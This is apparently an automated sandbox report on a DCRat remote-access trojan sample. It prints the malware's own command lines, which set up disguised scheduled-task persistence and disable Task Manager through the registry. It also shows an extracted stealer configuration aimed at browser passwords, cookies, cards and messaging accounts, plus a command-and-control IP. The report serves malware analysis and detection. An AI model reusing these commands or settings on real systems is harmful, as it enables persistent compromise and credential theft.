Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setupx-64.exe

Overview

General Information

Sample name:Setupx-64.exe
Analysis ID:1663901
MD5:40bbdf50224ee7835a301e7cebf510d8
SHA1:04aa4f725cedfee798b11fa49fe048331f776d81
SHA256:d8befd70003d111bb42cda71b9ccfccbdd39c84f8d57c0420ec123fa86177b42
Tags:exeuser-FelloBoiYuuka
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Joe Sandbox ML detected suspicious sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • Setupx-64.exe (PID: 8180 cmdline: "C:\Users\user\Desktop\Setupx-64.exe" MD5: 40BBDF50224EE7835A301E7CEBF510D8)
    • wscript.exe (PID: 3576 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Blockruntime.exe (PID: 7588 cmdline: "C:\ComcontainerruntimeCrtNet\Blockruntime.exe" MD5: F2338409BEF7A5FF68A39BC9E4D1F824)
          • schtasks.exe (PID: 7832 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7928 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8004 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Recovery\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7980 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8024 cmdline: schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 7 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3040 cmdline: schtasks.exe /create /tn "RZctPlhC2XmeDKsE7v" /sc ONLOGON /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2648 cmdline: schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 8 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5268 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1016 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4372 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5944 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3796 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • upfc.exe (PID: 5068 cmdline: "C:\Program Files (x86)\google\Update\upfc.exe" MD5: F2338409BEF7A5FF68A39BC9E4D1F824)
        • reg.exe (PID: 1928 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • fontdrvhost.exe (PID: 6524 cmdline: C:\Recovery\fontdrvhost.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)
  • fontdrvhost.exe (PID: 7840 cmdline: C:\Recovery\fontdrvhost.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)
  • RZctPlhC2XmeDKsE7v.exe (PID: 7188 cmdline: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)
  • RZctPlhC2XmeDKsE7v.exe (PID: 7256 cmdline: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)
  • cleanup
{"SCRT": "{\"L\":\"!\",\"M\":\">\",\"d\":\";\",\"C\":\"&\",\"6\":\"^\",\"i\":\",\",\"P\":\"|\",\"R\":\")\",\"Q\":\"~\",\"o\":\" \",\"A\":\"#\",\"X\":\"<\",\"9\":\"(\",\"W\":\"`\",\"y\":\"$\",\"G\":\"*\",\"J\":\"-\",\"0\":\"@\",\"B\":\"_\",\"k\":\".\",\"S\":\"%\"}", "PCRT": "{\"L\":\" \",\"T\":\"%\",\"x\":\"^\",\"J\":\"|\",\"F\":\"`\",\"W\":\"<\",\"X\":\"-\",\"0\":\"~\",\"n\":\"#\",\"N\":\"_\",\"B\":\"$\",\"Y\":\"(\",\"S\":\".\",\"a\":\">\",\"k\":\"*\",\"l\":\"&\",\"H\":\")\",\"R\":\"!\",\"U\":\"@\",\"5\":\";\",\"9\":\",\"}", "TAG": "", "MUTEX": "ZaUWITXGrfAGfL0yFHjd", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
SourceRuleDescriptionAuthorStrings
00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
    00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
      00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
        00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
          00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 8 entries

            System Summary

            barindex
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ComcontainerruntimeCrtNet\Blockruntime.exe, ProcessId: 7588, TargetFilename: C:\Recovery\fontdrvhost.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Setupx-64.exe", ParentImage: C:\Users\user\Desktop\Setupx-64.exe, ParentProcessId: 8180, ParentProcessName: Setupx-64.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" , ProcessId: 3576, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ComcontainerruntimeCrtNet\Blockruntime.exe" , ParentImage: C:\ComcontainerruntimeCrtNet\Blockruntime.exe, ParentProcessId: 7588, ParentProcessName: Blockruntime.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f, ProcessId: 5944, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-12T21:40:21.057743+020020341941A Network Trojan was detected192.168.2.549692141.8.192.8480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-12T21:40:38.173347+020028508621Malware Command and Control Activity Detected141.8.192.8480192.168.2.549696TCP
            2025-04-12T21:42:09.544478+020028508621Malware Command and Control Activity Detected141.8.192.8480192.168.2.549728TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ComcontainerruntimeCrtNet\0U7uHZW.vbeAvira: detection malicious, Label: VBS/Runner.VPA
            Source: C:\Recovery\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"L\":\"!\",\"M\":\">\",\"d\":\";\",\"C\":\"&\",\"6\":\"^\",\"i\":\",\",\"P\":\"|\",\"R\":\")\",\"Q\":\"~\",\"o\":\" \",\"A\":\"#\",\"X\":\"<\",\"9\":\"(\",\"W\":\"`\",\"y\":\"$\",\"G\":\"*\",\"J\":\"-\",\"0\":\"@\",\"B\":\"_\",\"k\":\".\",\"S\":\"%\"}", "PCRT": "{\"L\":\" \",\"T\":\"%\",\"x\":\"^\",\"J\":\"|\",\"F\":\"`\",\"W\":\"<\",\"X\":\"-\",\"0\":\"~\",\"n\":\"#\",\"N\":\"_\",\"B\":\"$\",\"Y\":\"(\",\"S\":\".\",\"a\":\">\",\"k\":\"*\",\"l\":\"&\",\"H\":\")\",\"R\":\"!\",\"U\":\"@\",\"5\":\";\",\"9\":\",\"}", "TAG": "", "MUTEX": "ZaUWITXGrfAGfL0yFHjd", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeReversingLabs: Detection: 76%
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeReversingLabs: Detection: 76%
            Source: C:\Program Files (x86)\Google\Update\upfc.exeReversingLabs: Detection: 76%
            Source: C:\Recovery\fontdrvhost.exeReversingLabs: Detection: 76%
            Source: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exeReversingLabs: Detection: 76%
            Source: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exeReversingLabs: Detection: 76%
            Source: Setupx-64.exeVirustotal: Detection: 63%Perma Link
            Source: Setupx-64.exeReversingLabs: Detection: 66%
            Source: Submited SampleNeural Call Log Analysis: 99.8%
            Source: Setupx-64.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Setupx-64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: nC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: }C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: fC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: yC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: wC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
